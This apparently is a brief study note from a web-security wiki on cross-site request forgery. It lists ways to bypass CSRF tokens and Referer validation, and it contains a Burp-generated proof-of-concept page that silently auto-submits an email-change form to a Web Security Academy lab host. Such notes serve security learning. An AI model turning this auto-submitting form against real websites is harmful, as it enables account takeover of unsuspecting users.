CSRF

CSRF(Cross Side Request Forgery)

	document.forms[0].submit()

Use Burp Professional BurpPOC Generator

CSRF Vulnerability with no defences

Ways to Defend CSRF

Bypassing CSRF tokens

CSRF is applied but not checked in all request methods (POST GET)
Validation of CSRF token depends on token being present otherwise not
CSRF is not displayed in home section and Session cookie is not linked | pasting same CSRF will work in this case
CSRF cookie should be same but can be manipulated (csrf=mynameisghoul)

Bypassing Referer Headers

CSRF with broken Referer validation

In the head part add Referrer-Policy: unsafe-url
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/your_website_domain')</script>
    <form action="<https://0a9300ba037f355dc021aeaa00a500e8.web-security-academy.net/my-account/change-email>" method="POST">
      <input type="hidden" name="email" value="fdgddfg&#64;fsds&#46;sdfds" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Removing the referer header completely can bypass CSRF

Add the following into HTML coed
<meta name="referrer" content="never">

PreviousWebsockets NextXSS Filters

Last updated 4 months ago